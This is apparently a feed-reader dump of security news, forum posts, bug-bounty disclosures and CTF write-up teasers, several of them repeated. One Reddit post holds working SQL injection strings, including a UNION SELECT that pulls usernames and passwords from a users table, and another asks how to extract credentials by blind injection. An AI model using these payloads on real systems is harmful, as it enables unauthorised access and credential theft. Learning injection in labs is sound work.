    A journey into IoT - Unknown Chinese alarm - Part 2 - Firmware dump and analysis
    submitted by /u/0xdea [link] [comments]
  • Open

    Cellebrite advise needed
    Received two (iPhone & Android) UFDR reports and Cellebrite Reader. For the iPhone I decided to export the searches as EML and bring it into our review platform. Reason I went with EML export was because it includes the message attachment within the EML message and our platform extracts it as parent child. It also populates the fields "TO" "FROM" "DATES" with receiver and sender. I am having trouble doing this with the Android. It has no EML export. PDF export would work but it creates hyperlinks with folders for the message attachments. Which makes it more difficult to tie the attachments to the message when I bring it into the review platform. Any suggestions would help. XML export support is on development at the moment. submitted by /u/theedon323 [link] [comments]
    Recovering deleted telegram messages
    What is a good tool that can help me with recovering deleted telegram messages? I have an iPhone with full file system extraction. I have tried Magnet AXIOM and it is able to extract recent telegram chats. It is clear from these chats that some messages were deleted by the user - which AXIOM unfortunately seems to be not able to retrieve. I tried manually searching through the sqlite db but did not have any luck. Oxygen forensics claimed a couple of years ago it could retrieve deleted telegram messages but there has not been a lot of discussion of this topic in the DFIR community since. Are deleted telegram messages a lost cause at this point? submitted by /u/Sea_Cold_7611 [link] [comments]
    Retrieve deleted picture.jpg from image in linux
    As the title says, I want to retrieve a jpg picture from an image I created in linux using dd. I used the fls command to find the inode of the picture and used it together with the istat command to view the meta data of the file. What I want to do now is basically extract this picture using dd. Like dd if=example.dd of=picture.jpg bs=... skip=... count=..., but there is one problem, I dont know what to enter on bs, skip and count. I've read that I need to calculate something but I feel that I need to understand the whole process in general instead of jumping right into the calculation. Anyone that has some time to explain this to me and maybe give me some examples by extracting something from your own images(if you have one). Would rly appreciate it! Thanks! submitted by /u/ahmedmourad22 [link] [comments]
  • Open

    5 Tips for new leads in Trace Labs Search Party
    I recently participated in the Trace Labs Search Party CTF, if you’re not familiar it’s a non-theoretical OSINT CTF where participants… Continue reading on Medium »
    War in Ukraine / May 19
    👉 Lend-Lease and Western Strategy [Expert View] Continue reading on Medium »
    All Defense Tool
    First of all congratulations on finding the treasure. This project integrates excellent offensive and defensive weapons projects in the… Continue reading on Medium »
  • Open

    Wormhole Uninitialized Proxy Bugfix Review
    Summary Continue reading on Immunefi »
    CVE-2021–43798 Grafana | Vulnerabilidade de leitura arbitrária não autorizada de arquivos
    Versão 8.3.0 Continue reading on Medium »
    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
    SSRF Leads To AWS Metadata Exposure
    How can you leverage an SSRF (“Server Side Request Forgery”) vulnerability to evade filters and leak internal AWS credentials on a web… Continue reading on System Weakness »
    Incentivized testing for $ZKP Advanced Staking is now LIVE!
    Advanced $ZKP Staking Testing with 100,000 $ZKP in rewards is starting today. Welcome to Panther Zafari’s Beta! Continue reading on Panther Protocol »
  • Open

    SecWiki News 2022-05-20 Review
    PE文件结构解析1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-20 Review
    PE文件结构解析1 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    This website will shut down soon, but they have an open directory (the C-Disk) full of old pictures and weird software from the '90s/00's
    submitted by /u/dadumir_party [link] [comments]
    knitting patterns
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    deformed dogs and their owners
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Data hoarder archive found
    http://80.56.13.139/arc2/ submitted by /u/jaydenthorup [link] [comments]
  • Open

    Alan c2 Framework v7.0: Hyper-Pivoting
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Clickjacking at app.lemlist.com
    lemlist disclosed a bug submitted by ondermedia: https://hackerone.com/reports/1574017
    Arbitrary POST request as victim user from HTML injection in Jupyter notebooks
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1409788 - Bounty: $8690
    Error in Deleting Deck cards attachment reveals the full path of the website
    Nextcloud disclosed a bug submitted by ctulhu: https://hackerone.com/reports/1354334 - Bounty: $100
    Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1450117 - Bounty: $250
    Sensitive files/ data exists post deletion of user account
    Nextcloud disclosed a bug submitted by geekysherlock: https://hackerone.com/reports/1222873 - Bounty: $150
  • Open

    Splunk SPL Queries for Detecting gMSA Attacks
    1    Introduction What is a group Managed Service Account (gMSA)? If your job is to break into networks, a gMSA can be a prime target for a path to escalate privileges, perform credential access, move laterally or even persist in a domain via a ‘golden’ opportunity. If you’re an enterprise defender, it’s something you need... The post Splunk SPL Queries for Detecting gMSA Attacks appeared first on TrustedSec.
  • Open

    Widespread Swagger-UI library vulnerability leads to DOM XSS attacks
    Article URL: https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks Comments URL: https://news.ycombinator.com/item?id=31447130 Points: 1 # Comments: 0
  • Open

    I Obtained ADMIN access via Account Activation link [In 30 seconds]
    Folks, for those of you who didn’t know, I absolutely have a blast every-time I have to perform web app testing; because the way to… Continue reading on Medium »
  • Open

    Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
    CVE-2022-22954, one of several recently published VMware vulnerabilities, is being exploited in the wild. Read our observations and recommendations. The post Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) appeared first on Unit42.
  • Open

    雾帜智能:AI和SOAR技术加速自动化应急响应 | 网安新势力SOLO发布季
    本期节目请到了安全运营新势力,上海雾帜智能科技有限公司创始人兼CTO傅奎,分享《争分夺秒,加速应急响应》的议题。
    2022年CISO之声全球洞察报告 | 威胁的不确定性和错误的安全感
    各种备受瞩目的违规行为产生了深远的经济和安全影响,向世界展示了关键基础设施和供应链在成为网络犯罪分子的目标时是多么脆弱。
    上海安般科技招聘信息
    上海安般信息科技有限公司是发源于中国科学院微系统&amp;amp;上海科技大学,国内首家国际领先从事于商业化智能模糊测试技术的公司
    终端安全 | Intent重定向漏洞分析
    攻击者结合了系统应用中的动态广播注册漏洞模型和Intent重定向漏洞模型,对终端造成了极大的威胁。
    Conti光速倒闭?或许它只是换个方式重生
    前脚还在叫嚣要推翻哥斯达黎加政府,后脚就宣布倒闭?据Advanced Intel透露,其内部基础设施已关闭。
    关于恶意邮件的防范及处置措施
    钓鱼邮件是黑客经常采用的手段之一,黑客利用钓鱼邮件进行网络安全攻击的案例比比皆是。
    FreeBuf周报 | 游戏巨头暴雪再遭DDoS攻击;苹果紧急更新修复零日漏洞
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」。
    奇形怪状之java框架漏洞
    是人都能看懂的框架漏洞讲解~
    权威认可!斗象科技荣获CNNVD优秀技术支撑单位和CNNVD特殊贡献奖
    斗象科技作为CNNVD一级技术支撑单位,被授予“CNNVD 2021年度优秀技术支撑单位”和 “2021年度特殊贡献”两大奖项
    RSA创新沙盒盘点|BastionZero——零信任基础设施访问服务
    <p>RSAConference2022将于旧金山时间6月6日召开。大会的Innovation Sandbox(沙盒)大赛作为&ldquo;安全圈的奥斯卡&rdquo;,每年都备受瞩目,成为全球网络安
    美国CFAA迎来重大修订,白帽黑客或将无责
    CFAA明确指出网络安全研究人员或白帽黑客有着“改善技术”的良好愿景,因此司法部门将不再以CFAA起诉他们。
    比渗透测试更有用,红队演练该如何开展?
    对于大多数企业组织而言,真正的纵深防御战略应该包括红队演练这个环节。
    微软检测到Linux XorDDoS恶意软件活动激增
    一种用于入侵Linux设备并构建DDoS僵尸网络的隐秘模块化恶意软件的活动量大幅增加了254%.
    日经新闻亚洲子公司遭勒索软件攻击
    据出版巨头日经新闻(Nikkei)透露,该集团在新加坡的总部于5月13日遭到勒索软件攻击。
    黑客创建“机器人”电话,企图浪费俄罗斯官员时间
    黑客创建一网站,允许访问者随机选择两名俄罗斯官员拨打恶作剧电话,浪费他们的时间。
    FreeBuf甲方群话题讨论 | 聊聊“删库”这件事
    链家数据库管理员删库一案表明,删库已成为企业面对来自内部的安全风险时不得不顾及的要素之一,为此企业应该如何应对?
    ATT&CK 框架真的只是花架子吗?
    聊聊玄学的ATT&amp;amp;CK落地
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    Implementing Security in SDLC
    Introduction Continue reading on InfoSec Write-ups »
    Wireless Penetration Testing (WPA-2 Cracking)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Intergalactic Post Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Amidst Us Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Misc — Compressor Write-up (easy way)
    No content preview
    Cyber Apocalypse CTF 2022 — Web — Kryptos Support Write-up
    No content preview
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    No content preview
  • Open

    CVE-2022-26809 RPC 高危漏洞复现与分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年5月20日 1. 漏洞介绍 2022年4月份修复的高危漏洞 CVE-2022-26809 距今已经过去一月有余,期间除了 L1nk 师傅发了一篇关于 GetCoalescedBuffer() 漏洞函数触发条件的分析,再无其他消息。我这边虽然分析出了 ProcessReceivedPDU() 漏洞函数的触发逻辑,但苦于无法在默认系...
  • Open

    CVE-2022-26809 RPC 高危漏洞复现与分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年5月20日 1. 漏洞介绍 2022年4月份修复的高危漏洞 CVE-2022-26809 距今已经过去一月有余,期间除了 L1nk 师傅发了一篇关于 GetCoalescedBuffer() 漏洞函数触发条件的分析,再无其他消息。我这边虽然分析出了 ProcessReceivedPDU() 漏洞函数的触发逻辑,但苦于无法在默认系...

  • Open

    Wiping a lot of SSDs
    I work in corporate legal doing e-discovery work. The end of the process for most of my cases involves destruction of the collected data. I've been using DBAN to wipe spinning rust drives for years, as well as SSDs as they started to replace HDDs. The newer laptops with UEFI and no legacy boot make using DBAN challenging. When DBAN didn't work, I'd connect it through a USB adapter, boot into Linux, mount it RW, and just sudo dc3dd wipe=/dev/sdc A few months ago, a co-worker pointed out that an SSD might move data into an overwritten sector while the wipe is in process, meaning that with these processes, we can't be sure that all data's been wiped. We've got two cases that might wrap up in the next few months where I've collected 100+ M.2 2280 SSDs. Most (but not all) of the drives are BitLocker encrypted. In theory I could just clear my hands like a blackjack dealer and say "not my problem; keyless encryption is as good as wiping," but 1) I'm not certain every drive is encrypted, and 2) I'm not certain BitLocker protects everything (boot sector? MFTs?) in an unretrievable manner. Some of the data We could also toss them in a box for Iron Mountain to deal with, but for "reasons" (i.e., some data should pass through as few hands as possible) we'd prefer to know that it's done internally and not handed off to an outside vendor. Physical destruction is an option, but burning through a few thousand dollars in otherwise usable SSDs feels like a waste. These SSDs are all from Dell laptops, but have various SSD manufacturers, including Intel, Lite-On, Samsung, Toshiba, SanDisk, and SK Hynix. I might be able to budget several hundred dollars for hardware or software, but this isn't the kind of thing that I need to do more than once every few years, so a costly one-time solution isn't a good option (compared to swapping out SSDs one at a time in my free time for the next year or so). What approach would you take in this situation? submitted by /u/RulesLawyer42 [link] [comments]
    plaso timeline analysis
    I'm new to plaso, I know how to create one but I don't know how it be helpful or where to look when I want to know when was backdoor file created or if the antivirus detected malicious file or the creation time of backdoor registry key Is there some examples that might help making things clear ? submitted by /u/sk8er_girl90 [link] [comments]
    PST search tool
    Any good programs where I can import a PST and do searches, tag and export those tags to PST submitted by /u/theedon323 [link] [comments]
    Trying to play security camera footage from 2004. It's going as well as you'd expect.
    I'm trying to extract video footage that was downloaded from an unknown security system back in 2004. The files were originally on an Iomega 100mb Zip Drive if anyone remembers those things. I transferred the files to my laptop, and in the folder there was included a program called "Image Vault Viewer" (IVViewer.exe) which I assume is supposed to be the player application. (I had to open it in XP Compatibility Mode to get it to run.) When I choose to open a file from the application interface, I'm only allowed to select one file type (.cls) and I get an error as shown in the video. I recorded my screen so you can see all the different file types in the folder, as well as the error when trying to open something. A note, the (.vls) files show as being associated with IVViewer because I tried to open them with that program. That didn't work. You'll also see an "Ableton Live Set" (.als) file, but that's probably because I have Ableton audio installed on my laptop. I'm sure that 18 years ago the (.als) file extension was associated with something else. Can anyone give me some tips here? The video files show a murder occurring. The suspect was on the run for years and was just recently caught, but technology has advanced so much since then that this older stuff is really hard to work with. Thanks! https://reddit.com/link/ut3z7z/video/no7r4aujsf091/player submitted by /u/YabbaDabbaDoofus [link] [comments]
    Snapchat Forensics on smartphones
    Hi, fellow experts, I've been testing Snapchat's features and have a few questions to ask: Is it possible to recover Snapchat text messages (not images & videos) on Android and Apple smartphones? I can see images under Snapchat file folder on the phone. Is it possible to know who sent them (Snapchat username)? I'm having a hard time determining the correlation between XML record and actual image. Is there a sure way to determine who sent what? submitted by /u/Dreamlad [link] [comments]
    Digital Forensics Masterclass
    submitted by /u/cybersocdm [link] [comments]
  • Open

    Rolling Thunder is a Go
    How Ottawa’s War Memorial is becoming a symbol of polarization and division Continue reading on Medium »
    War in Ukraine / May 18
    The Russian army reduced the offensive Continue reading on Medium »
    One day in a life of OSINT geek: how Data Lookup helps to learn a lot in a couple of clicks
    We are actively developing our online Data Lookup tool, as more and more users tend to fulfill their OSINT tasks using quick and simple… Continue reading on Medium »
    Find anything online with Google dorks — part 1
    Google dorks are a fantastic way to to quickly filter search results and find an absolute treasure trove of information online. By simply… Continue reading on Medium »
    My Telegram investigation toolkit…
    Hooray, my channel has exceeded 200 subscribers… As promised, I am posting my selection of sources intended for investigations in Telegram… Continue reading on Medium »
  • Open

    Bug Bounty Diaries #2
    Hi guys! I’m back with a new blog and this is great because again… I learn a lot of things, specially about DNS, IP and things like that. Continue reading on Medium »
    A Story of DOM XSS
    Good day, everyone! This is my second article, this time on DOM XSS. An open redirection vulnerability was escalated to DOM XSS. If you… Continue reading on Medium »
    Cyber Apocalypse CTF 2022 — Intergalactic Chase Write up
    Hello everyone I am Hac and today we are doing Cyber Apocalypse CTF 2022 , Specifically this challenges :- Continue reading on InfoSec Write-ups »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on CoinsBench »
    Hacking Web3: Introduction and How to Start
    Web3 is a newfound technology, and it’s claimed that it can greatly increase the security on the websites using it. In fact, web3 is a new… Continue reading on Medium »
    How I was able to access IBM internal documents
    Hi, today I will share how I was able to access internal data of https://weathercommunity.ibm.com using salesforce misconfiguration. Continue reading on Medium »
    From Wayback to Account Takeover
    Hi, I would like to share how Wayback Machine leads to limited Account Takeover. Continue reading on Medium »
    CRLF (%0D%0A) Injection
    Hello Guys! I am vasu a bug bounty researcher Continue reading on Medium »
    How I Got $1083 worth of book bundle for just $1 — #Bugbounty
    Price manipulation at checkout: Continue reading on Medium »
    How I Exploited 4 Vulnerabilities In A Website
    This blog is only for informational purpose only so that emerging bug hunters could follow similar methodology and responsibly disclose… Continue reading on Medium »
    A pragmatic guide to building your bug bounty program
    Part 1: Getting set up, and maintaining your program Continue reading on Airwallex Engineering »
  • Open

    Scam and Malicious APK targeting Malaysian: MyMaidKL Technical Analysis
    submitted by /u/Rempah [link] [comments]
    Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices
    submitted by /u/SCI_Rusher [link] [comments]
    Exploiting an Unbounded memcpy in a Guest-to-Host escape of Parallels Desktop
    submitted by /u/gaasedelen [link] [comments]
    Killnet Attacks Against Italy and NATO Countries
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
    We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain. The post Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies appeared first on Unit42.
  • Open

    【安全通报】VMware 身份验证绕过漏洞(CVE-2022-22972)
    近日,VMware 官方发布安全公告修复了一个高威胁性的身份验证绕过漏洞,该漏洞涉及 Workspace ONE Access、Identity Manager 和 vRealize Automation 产品,目前...
  • Open

    【安全通报】VMware 身份验证绕过漏洞(CVE-2022-22972)
    近日,VMware 官方发布安全公告修复了一个高威胁性的身份验证绕过漏洞,该漏洞涉及 Workspace ONE Access、Identity Manager 和 vRealize Automation 产品,目前...
  • Open

    How Dual Messenger technically works on Samsung devices
    I know that Android os is a privilege-separated OS in which each application have a separate /data folder in which it writes and each app has its own PID , with that mentioned I believe that my question's answer can easily be observed through a rooted devices i.e how an applied dual messenger is structured its folders etc, are these two apps ( the original and clone) share same storage? anyone could give a technical detail how this works? ​ Thanks submitted by /u/Camera-Soft [link] [comments]
    Does a DNS enabled "gray-net", akin to the dark net w/ onion sites, exist?
    Question spawned from: https://www.reddit.com/r/degoogle/comments/usi7w7/protonmail_ios_android_mobile_apps_sending/i97bt4a/ https://www.reddit.com/r/privacy/comments/uscrg2/protonmail_app_on_ios_regularly_talking_to_google/ https://www.reddit.com/r/ProtonMail/comments/uscbnz/protonmail_app_on_ios_constantly_talking_to/i93is94/ tl;dr - proton github source code for a few of their different apps reference the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Traditional ping & nslookup do not find the host dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz. Using a tool that can do DoH to quad9, dMFYGSLTQOJXXI33ONVQWS3BOMNUA.protonpro.xyz resolves to dayana.ns.cloudflare.com. I'm not a DNS wizard, so I'm not sure if I'm understanding this right, so call me out: is it possible for 3rd party DNS providers to have hosts that resolve only thru that 3rd party, and only over DoH vs traditional DNS??? i.e. a "gray net" that's only resolveable via certain DNS methods? submitted by /u/SOsint [link] [comments]
    Unable to install VirtualBox NDIS6 Bridged Networking Driver.
    Hello, I am having trouble installing the NDIS6 Bridged Networking Driver. I tried to install the program in the title in my environment and got the message "The requested functionality was not found. The specified module cannot be found" and I cannot install it. I have no idea which module to install, etc., so I would like to know the solution. submitted by /u/Awkward_String139 [link] [comments]
    deleted post with solutions: 'Hi, code injection help please'
    Hi, I'm typing 1' or ‘1’=’1 in the search box when trying to find all the persons, usernames and passwords in the database. But I get the following error message: ​ There was error in your query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 ​ The Server version is : Apache/2.4.41 (Ubuntu) and I found that is version MariaDB-5.5.41 ​How can find the right syntax?​ Thanks ​ SOLUTIONS: It worked with typing only ' OR 1=1; # for showing all the persons in the database ​ And ' UNION SELECT null, username, password FROM users # ​ to find all the usernames and passwords in the database. submitted by /u/Traditional_Bird_877 [link] [comments]
    Help with blind SQL injection please
    Hello, I need to get the usernames and passwords from an Online Auction System: http://www.blabla.com/index.php?product=Chair ​ I've tried injecting this but no results: /index.php?product=select%20username,%20password%20from%20users%20where%20product=Chair%20and%201%3D1%20%23 ​ Can i have some help? Thanks submitted by /u/Traditional_Bird_877 [link] [comments]
    Cannot create host-only adapter on VirtualBox
    I am unable to create a host-only adapter. I am using version 6.1.22. The following is the error message. Querying NetCfgInstanceId failed (0x00000002). Exit code : E_FAIL (0x80004005) Component: HostNetworkInterfaceWrap Interface: IHostNetworkInterface {455f8c45-44a0-a470-ba20-27890b96dba9} submitted by /u/Awkward_String139 [link] [comments]
  • Open

    8x8pilot.com: Reflected XSS in Apache Tomcat /jsp-examples example directory
    8x8 disclosed a bug submitted by huntinex: https://hackerone.com/reports/1400357
    Stored XSS in repository file viewer
    GitLab disclosed a bug submitted by kannthu: https://hackerone.com/reports/1072868 - Bounty: $2000
    Email html Injection
    Slack disclosed a bug submitted by smitgharat0001: https://hackerone.com/reports/1461194 - Bounty: $250
    XSS and iframe injection on tiktok ads portal using redirect params
    TikTok disclosed a bug submitted by cancerz: https://hackerone.com/reports/1514554 - Bounty: $1000
  • Open

    SecWiki News 2022-05-19 Review
    Wobfuscator:将部分JavaScript恶意代码转换为WebAssembly以逃避检测 by ourren 基础架构安全弹性技术指南草案(固件安全篇) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-19 Review
    Wobfuscator:将部分JavaScript恶意代码转换为WebAssembly以逃避检测 by ourren 基础架构安全弹性技术指南草案(固件安全篇) by ourren 更多最新文章,请访问SecWiki
  • Open

    Disclosure of Top Vulnerability
    Article URL: https://hackerone.com/reports/397031 Comments URL: https://news.ycombinator.com/item?id=31436248 Points: 1 # Comments: 0
  • Open

    OSS-Fuzz: Continuous Fuzzing for Open Source Software
    Article URL: https://google.github.io/oss-fuzz/ Comments URL: https://news.ycombinator.com/item?id=31435504 Points: 2 # Comments: 0
  • Open

    Java反序列化基础篇-01-反序列化概念与利用
    写这篇文章,是想在 Java 反序列化基础的地方再多过几遍,毕竟万丈高楼平地起。
    有手就行的白加黑实战免杀
    超级干货!有手就行的白加黑实战免杀!
    虚假广告广泛撒网,你被钓鱼了吗?
    保持警惕,保持怀疑。
    FreeBuf早报 | 2021 年赎金需求激增 45%;德州近 200 万个人信息被曝光了三年
    根据 Group-IB 的数据,2021 年的平均赎金需求为 247000 美元,比上一年增加了 45%。
    手把手教你实现tomcat内存马
    手把手教你实现tomcat内存马,快来学习吧。
    信捷PLC编程软件zip slip漏洞:CVE-2021-34605研究
    信捷PLC编程软件V3.5.1存在zip slip漏洞,攻击者在打开特殊制作的项目文件时,可获得任意文件写入权限。
    德州近200万个人信息被曝光了三年
    近日,由于德州保险部门(TDI)的一个编程问题,德克萨斯近200万人的个人信息被暴露了近三年。
    Conti团伙威胁推翻哥斯达黎加政府
    近日,勒索软件团伙Conti向哥斯达黎加政府发出威胁要“推翻”该国政府。
    VMware 修补了多个产品中的关键身份验证绕过漏洞
    VMware 多个产品中出现关键身份验证绕过漏洞,漏洞允许攻击者获取管理员权限。
    微软:警惕针对 MSSQL 服务器的暴力攻击
    微软正对使用MSSQL数据库服务器的用户发出安全警告,警惕攻击者利用弱密码对暴露在网络上的 MSSQL发动暴力攻击。
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Active Directory Overview
    No content preview
    Unicode from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    A new way to bypass `__wakeup()` and build POP chain
    作者:1nhann 原文链接:https://inhann.top/2022/05/17/bypass_wakeup/ 本文以 Laravel 9.1.8 为例,介绍一个通用的新思路,用以绕过 pop chain 构造过程中遇到的 __wakeup() 环境搭建 Laravel 9.1.8 routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows域内提权漏洞分析
    作者:dre4merp 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 本文更多的是根据调试Windows Server 2003,分析漏洞成因。 阅读本文需要一定的Kerberos基础知识、Windows源码阅读调试能力。单纯的阅读可能并不能完全理解其中的关键点,需要进行调试理解。 背景 漏洞编号为:CV...
  • Open

    A new way to bypass `__wakeup()` and build POP chain
    作者:1nhann 原文链接:https://inhann.top/2022/05/17/bypass_wakeup/ 本文以 Laravel 9.1.8 为例,介绍一个通用的新思路,用以绕过 pop chain 构造过程中遇到的 __wakeup() 环境搭建 Laravel 9.1.8 routes/web.php : <?php use Illuminate\Suppo...
    CVE-2021-42287 Windows域内提权漏洞分析
    作者:dre4merp 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 写在前面 本文更多的是根据调试Windows Server 2003,分析漏洞成因。 阅读本文需要一定的Kerberos基础知识、Windows源码阅读调试能力。单纯的阅读可能并不能完全理解其中的关键点,需要进行调试理解。 背景 漏洞编号为:CV...
  • Open

    Advanced Persistent Threat (APT) Malware Samples and Research Papers Collection
    submitted by /u/cybersocdm [link] [comments]
  • Open

    K8s 集群稳定性:LIST 请求源码分析、性能评估与大规模基础服务部署调优
    对于非结构化的数据存储系统来说,LIST 操作通常都是非常重量级的,不仅占用大量的 磁盘 IO、网络带宽和 CPU,而且会影响同时间段的其他请求(尤其是响应延迟要求极高的 选主请求),是集群稳定性的一大杀手。 例如,对于 Ceph 对象存储来说,每个 LIST bucket 请求都需要去多个磁盘中捞出这个 bucket 的全部数据;不仅自身很慢,还影响了同一时间段内的其他普通读写请求,因为 IO 是共享的,导致响应延迟上升乃至超时。如果 bucket 内的对象非常多(例如用作 harbor/docker-registry 的存储后端),LIST 操作甚至都无法在常规时间内完成( 因而依赖 LIST bucket 操作的 registry GC 也就跑不起来)。 又如 KV 存储 etcd。相比于 Ceph,一个实际 etcd 集群存储的数据量可能很小(几个 ~ 几十个 GB),甚至足够缓存到内存中。但与 Ceph 不同的是,它的并发请求数量可能会高 几个量级,比如它是一个 ~4000 nodes 的 k8s 集群的 etcd。单个 LIST 请求可能只需要 返回几十 MB 到上 GB 的流量,但并发请求一多,etcd 显然也扛不住,所以最好在前面有 一层缓存,这就是 apiserver 的功能(之一)。K8s 的 LIST 请求大部分都应该被 apiserver 挡住,从它的本地缓存提供服务,但如果使用不当,就会跳过缓存直接到达 etcd,有很大的稳定性风险。 本文深入研究 k8s apiserver/etcd 的 LIST 操作处理逻辑和性能瓶颈,并提供一些基础服务的 LIST 压力测试、 部署和调优建议,提升大规模 K8s 集群的稳定性。 kube-apiserver LIST 请求处理逻辑: 代码基于 v1.24.0,不过 1.19~1.24 的基本逻辑和代码路径是…

  • Open

    Bug Bounty Diaries #1
    Hi guys! I have a lot of things to say on this blog and the truth is that I didn’t try to exploit anything because WOW! Continue reading on Medium »
    Hack First, Bounty Later
    Two months ago we came across an interesting and somewhat provocative Tweet. Continue reading on Medium »
    How to Install airixss
    Hello all, we will see how to install airixss on kali linux. Continue reading on Medium »
    Creo Engine Presents ‘Evermore Knights Bug Bounty Contest’
    Creo Engine is developing its first game called “Evermore Knights” and Creo Engine recognizes the importance of security researchers in… Continue reading on Medium »
    Methods to Exploit HTML Injection
    In this article, we will discuss the HTML Injection vulnerability, and 3 methods of how to creatively leverage it for exploitation. Continue reading on Medium »
  • Open

    Anonymous Social Network Yik Yak Breached Precise GPS Locations
    submitted by /u/mkdtsh [link] [comments]
    Hack The Box - Timing - Writeup by Mădălin Dogaru
    submitted by /u/Madalin_Dogaru [link] [comments]
    Variant Cloud Analysis
    submitted by /u/Gallus [link] [comments]
    Wizard Spider hacking group detailed analysis
    submitted by /u/wtfse [link] [comments]
    TProxy: Wireshark dissection with manual and scripted interception
    submitted by /u/mexicanw [link] [comments]
  • Open

    Clipboard
    Can websites read/access our entire clipboard contents? I'm scared because I have my passwords,documents(passport/ID), pictures of me etc. saved on my clipboard. I obviously don't want any website viewing my clipboard...especially not the p*rn, or any unsafe sites I visit or even those phishing sites I got redirected to. I don't click or enter any login credentials on such sites but obviously do use the search bar. I don't even actually paste anything from my clipboard on these sites tho let me clear that. Or do they just see what I copied recently onto my clipboard? Help needed. I'm looking for an accurate and realistic answer and not some conspiracy theories. Thanks. submitted by /u/hamza_x17 [link] [comments]
    Excel & Power Bi for security/ data analysis
    Hi. Do you know any courses/blogs where excel or power bi are using for data analysis and building cool scharts? I very often use excel and to analyze data from Azure/SIEM/network data/user activity: bulding stats (pivot) or visualisation data (any timelines). Creating any formulas such as "how long the user has been inactive") or any parsing data. And I'm intresting in additional courses for excel/power bi for data analysis to improve my skills. What courses do you used? submitted by /u/athanielx [link] [comments]
    What network security monitoring (NSM) product do you know?
    Hi there. I'm looking for NSM producs (it can be open-source too). We in the company want to implement NSM. The first option is to organize everything by our resources on the base Zeek & Suricata & ELK (log manager), but I'm afraid it will be difficult to manage and support by our not large team. So, the second point is to delegate it to 3-party. The closest was to me Corelight, but they don't have agent for our envirement. AC-Hunter was intersting for me too, but they have main focus on C2 detection and some builn-in threat intel, so it's not enouth for our NSM. submitted by /u/athanielx [link] [comments]
    Analyze MP3 file for viruses
    I understand that MP3 files can contain viruses. Can you please suggest a way to analyze it apart from virustotal and other online AV ? Thanks submitted by /u/AnotherRedditUsr [link] [comments]
    Need Career Advice
    Hi I'm working as an Java Automation tester for 1 and half years. I'm not satisfied with my job and salary. I'm more interested in cybersecurity, from last year August I started learning Ethical Hacking and Pentesting principle. I have completed few basic rooms in THM and starting point machines in HTB(with help of hints from writeups). I can't quit my job right now and also I want to switch my domain. How do I get atleast entey level position in Cybersecurity? submitted by /u/sunilprashanthh [link] [comments]
    How to land a SOC analyst job without degree
    I need a reality check. All the employers are looking for experienced worker, however, there is no way to gain experience due to can't even land a job. Currently a helpdesk without any prior security experience. I've been applying entry level security jobs since January 2021. It seems really hard to land any entry level job here without CS or related degree. Just wondering if there is way to breakthrough the security field. If there is anything training program or certification can help me, please advise. submitted by /u/ChillaxJ [link] [comments]
  • Open

    Bypass global deny-lists by wrapping domains using "[]" in https://github.com/stripe/smokescreen
    Stripe disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1528242 - Bounty: $500
